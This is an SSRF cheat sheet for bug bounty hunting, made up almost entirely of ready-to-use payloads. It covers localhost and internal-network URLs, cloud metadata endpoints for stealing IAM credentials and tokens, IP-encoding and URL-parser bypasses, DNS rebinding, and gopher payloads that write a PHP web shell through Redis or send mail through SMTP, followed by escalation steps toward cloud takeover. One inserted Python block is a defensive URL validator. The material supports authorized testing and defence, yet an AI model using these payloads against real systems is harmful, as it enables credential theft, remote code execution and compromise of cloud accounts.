## Detection Points

### Common Vulnerable Parameters

```text
url=
uri=
path=
dest=
redirect=
next=
target=
rurl=
domain=
feed=
host=
site=
html=
data=
reference=
proxy=
callback=
imageurl=
iconurl=
webhookurl=
```
### Vulnerable Features

- PDF generators (wkhtmltopdf, Puppeteer)
- Image processors (ImageMagick)
- File imports (URL-based)
- Webhooks
- URL previews/unfurling
- Proxy services
- Translation services
- Document converters
- Screenshot services
- RSS/Feed readers
## Basic Payloads

### Localhost Access

```text
http://localhost
http://127.0.0.1
http://127.0.0.1:80
http://127.0.0.1:443
http://127.0.0.1:22
http://127.0.0.1:3306
http://[::1]
http://0.0.0.0
http://0
http://127.1
http://127.0.1
```
### Internal Networks

```text
http://192.168.0.1
http://192.168.1.1
http://10.0.0.1
http://172.16.0.1
http://169.254.169.254 # Cloud metadata
```
## Cloud Metadata Endpoints

### AWS

```text
# IMDSv1 (if not disabled)
http://169.254.169.254/latest/meta-data/
http://169.254.169.254/latest/meta-data/iam/security-credentials/
http://169.254.169.254/latest/meta-data/iam/security-credentials/[ROLE-NAME]
http://169.254.169.254/latest/user-data/
http://169.254.169.254/latest/dynamic/instance-identity/document
# IMDSv2 Bypass (need header)
# Sometimes apps set X-aws-ec2-metadata-token
http://169.254.169.254/latest/api/token [PUT with TTL header]
# Alternative IPs for 169.254.169.254
http://[::ffff:169.254.169.254]
http://0xa9.0xfe.0xa9.0xfe
http://0251.0376.0251.0376
http://2852039166
http://169.254.169.254.nip.io
```
### GCP

```text
http://169.254.169.254/computeMetadata/v1/
http://metadata.google.internal/computeMetadata/v1/
http://metadata/computeMetadata/v1/
http://169.254.169.254/computeMetadata/v1/instance/service-accounts/default/token
http://169.254.169.254/computeMetadata/v1/project/project-id
# Requires header: Metadata-Flavor: Google
# Some SSRF vulns allow header injection!
```
### Azure

```text
http://169.254.169.254/metadata/instance?api-version=2021-02-01
http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://management.azure.com/
# Requires header: Metadata: true
```
### DigitalOcean

```text
http://169.254.169.254/metadata/v1/
http://169.254.169.254/metadata/v1.json
http://169.254.169.254/metadata/v1/id
http://169.254.169.254/metadata/v1/user-data
```
### Kubernetes

```text
https://kubernetes.default.svc/
https://kubernetes.default
http://10.96.0.1 # Default API server
/var/run/secrets/kubernetes.io/serviceaccount/token # If file read
```
## Bypass Techniques

### Localhost Bypass

```text
# Decimal
http://2130706433 # 127.0.0.1
http://0x7f000001
http://017700000001 # Octal
# IPv6
http://[::1]
http://[::]
http://[0:0:0:0:0:0:0:1]
http://[::ffff:127.0.0.1]
http://[0000::1]
# Dot variations
http://127.1
http://127.0.1
http://127.0.0.1.
http://0.0.0.0
# URL parsing tricks
http://127.0.0.1.nip.io
http://127.0.0.1.xip.io
http://localtest.me
http://0x7f.0x0.0x0.0x1
http://0177.0.0.1
```
### Protocol Bypass

```text
# When http:// blocked
http://
hTTp://
HTTP://
//127.0.0.1 (protocol-relative)
localhost without scheme
# Other protocols
gopher://
dict://
file:///etc/passwd
ftp://
sftp://
ldap://
tftp://
```
### Domain Bypass (Whitelist)

```text
# If evil.com whitelisted
http://evil.com.attacker.com
http://attacker.com#evil.com
http://attacker.com?url=http://evil.com
http://evil.com@attacker.com
http://attacker.com\@evil.com # Parser confusion
# DNS rebinding
# Host that resolves to 127.0.0.1 after first lookup
http://1.1.1.1.1time.127.0.0.1.1time.repeat.rebind.it/
```
### URL Parsing Tricks

```text
# Fragmentation
http://127.0.0.1#@whitelisted.com
http://whitelisted.com@127.0.0.1
http://127.0.0.1%23@whitelisted.com
# Encoding
http://127.0.0.1%2523@whitelisted.com # Double encode
http://127%2e0%2e0%2e1
# Null byte (old parsers)
http://127.0.0.1%00.whitelisted.com
```
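A defender-side URL check covering the literal, scheme, userinfo and DNS-rebinding tricks listed under Localhost Bypass, Protocol Bypass, Domain Bypass and URL Parsing Tricks, as an added example that is not part of the original cheat sheet. It decodes decimal, hex, octal and short-dotted IPv4 literals the way libc's inet_aton does, unwraps IPv4-mapped IPv6, resolves names once, and denies anything that lands in an assumed private/link-local deny-list (`BLOCKED_NETS`, `legacy_ipv4` and `check_url` are names chosen here).

```python
import ipaddress
import socket
from urllib.parse import urlsplit

# Assumed deny-list: loopback, "this host", RFC 1918, CGNAT, link-local (where
# 169.254.169.254 lives) and the IPv6 equivalents; extend it per deployment.
BLOCKED_NETS = [ipaddress.ip_network(n) for n in (
    "0.0.0.0/8", "10.0.0.0/8", "100.64.0.0/10", "127.0.0.0/8", "169.254.0.0/16",
    "172.16.0.0/12", "192.168.0.0/16", "::/128", "::1/128", "fc00::/7", "fe80::/10")]

def legacy_ipv4(host):
    """Decode inet_aton-style literals (2130706433, 0x7f000001, 0177.0.0.1, 127.1)
    the way libc-based HTTP clients do, so we vet the address they would dial."""
    parts = host.split(".")
    if not 1 <= len(parts) <= 4 or not all(parts):
        return None
    try:  # radix per part: 0x-prefix hex, leading-zero octal, else decimal
        nums = [int(p, 16) if p[:2].lower() == "0x" else
                int(p, 8) if len(p) > 1 and p[0] == "0" else int(p, 10) for p in parts]
    except ValueError:
        return None
    width = 8 * (5 - len(parts))  # the last part fills every remaining byte
    if any(not 0 <= n <= 255 for n in nums[:-1]) or not 0 <= nums[-1] < 1 << width:
        return None
    return ipaddress.IPv4Address(sum(n << 8 * (3 - i) for i, n in enumerate(nums[:-1])) | nums[-1])

def check_url(url):
    """Return (allowed, reason); deny by default. Names are resolved once here and
    the fetcher must connect to the returned IPs: re-resolving enables DNS rebinding."""
    u = urlsplit(url)
    if u.scheme not in ("http", "https"):  # no gopher://, file://, dict://, ...
        return False, "scheme not allowed: %r" % u.scheme
    host = (u.hostname or "").rstrip(".")  # lowercased, brackets stripped, no port
    if not host or "@" in u.netloc:  # whitelisted.com@127.0.0.1, \@ and %23@ tricks
        return False, "missing host or userinfo in URL"
    ip = legacy_ipv4(host)
    try:
        ips = [ipaddress.ip_address(host)] if ip is None else [ip]
    except ValueError:  # not a literal: one DNS lookup, keep every answer
        try:
            ips = [ipaddress.ip_address(a[4][0]) for a in socket.getaddrinfo(host, None)]
        except (socket.gaierror, ValueError):
            return False, "unresolvable host"
    for ip in ips:
        if ip.version == 6 and ip.ipv4_mapped:  # [::ffff:169.254.169.254]
            ip = ip.ipv4_mapped
        if any(ip in net for net in BLOCKED_NETS):
            return False, "%s resolves to blocked address %s" % (host, ip)
    return True, "ok"
```

Literal hosts are vetted offline; a hostname costs one DNS lookup, and the fetch that follows has to connect to the IPs this returns rather than resolving again, or the rebinding host above gets through.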
## Gopher Protocol

### Redis Commands

```text
gopher://127.0.0.1:6379/_
SET x "<?php system($_GET['c']); ?>"
CONFIG SET dir /var/www/html
CONFIG SET dbfilename shell.php
SAVE
# URL encoded
gopher://127.0.0.1:6379/_%2A1%0D%0A%248%0D%0Aflushall%0D%0A%2A3%0D%0A%243%0D%0Aset%0D%0A%241%0D%0A1%0D%0A%2428%0D%0A%0A%0A%3C%3Fphp%20system%28%24_GET%5B%27c%27%5D%29%3B%3F%3E%0A%0A%0D%0A%2A4%0D%0A%246%0D%0Aconfig%0D%0A%243%0D%0Aset%0D%0A%243%0D%0Adir%0D%0A%2413%0D%0A/var/www/html%0D%0A%2A4%0D%0A%246%0D%0Aconfig%0D%0A%243%0D%0Aset%0D%0A%2410%0D%0Adbfilename%0D%0A%249%0D%0Ashell.php%0D%0A%2A1%0D%0A%244%0D%0Asave%0D%0A
```
### Memcached

```text
gopher://127.0.0.1:11211/_stats
gopher://127.0.0.1:11211/_get%20key
```
### SMTP

```text
gopher://127.0.0.1:25/_HELO%20localhost%0AMAIL%20FROM%3A%3Cattacker%40evil.com%3E%0ARCPT%20TO%3A%3Cvictim%40target.com%3E%0ADATA%0ASubject%3A%20test%0A%0AMessage%0A.%0AQUIT
```
## Blind SSRF Detection

### DNS-Based

```text
http://attacker-controlled.burpcollaborator.net
http://ssrf-test.attacker.com
# Check DNS logs for:
# - IP address of server
# - Timing (confirms execution)
```
### Time-Based

```text
# Compare response times
http://192.168.1.1:80 # Fast if open
http://192.168.1.1:81 # Slow timeout if closed
# Slow internal endpoints
http://internal-api/slow-endpoint
```
### Error-Based

```text
# Different errors for:
# - Host exists vs doesn't
# - Port open vs closed
# - Protocol supported vs not
```
## Escalation Paths

### Internal Service Discovery

```text
# Common internal ports to scan
21    FTP
22    SSH
25    SMTP
80    HTTP
443   HTTPS
3306  MySQL
5432  PostgreSQL
6379  Redis
9200  Elasticsearch
11211 Memcached
27017 MongoDB
```
### From SSRF to RCE

1. Access internal admin panels (no auth internally)
2. Redis command execution
3. Gopher to internal services
4. Cloud metadata → IAM credentials → AWS CLI
5. Internal Git repos with secrets
6. Jenkins/CI without internal auth
7. Kubernetes API → pod exec
## Bug Bounty Tips

### High-Value Targets

- PDF export features
- Screenshot/preview services
- Webhook endpoints
- Import from URL
- OAuth callbacks with redirect
- Image/file URL fetching
### What to Extract First

1. Cloud metadata (credentials!)
2. Internal /etc/passwd, /etc/hosts
3. Internal API endpoints
4. Private Git repositories
5. Environment variables
6. Internal dashboards
### Report Impact Clearly

- "Read AWS credentials" > "Access internal network"
- Show actual extracted data
- Demonstrate cloud takeover if possible
- Chain with other vulns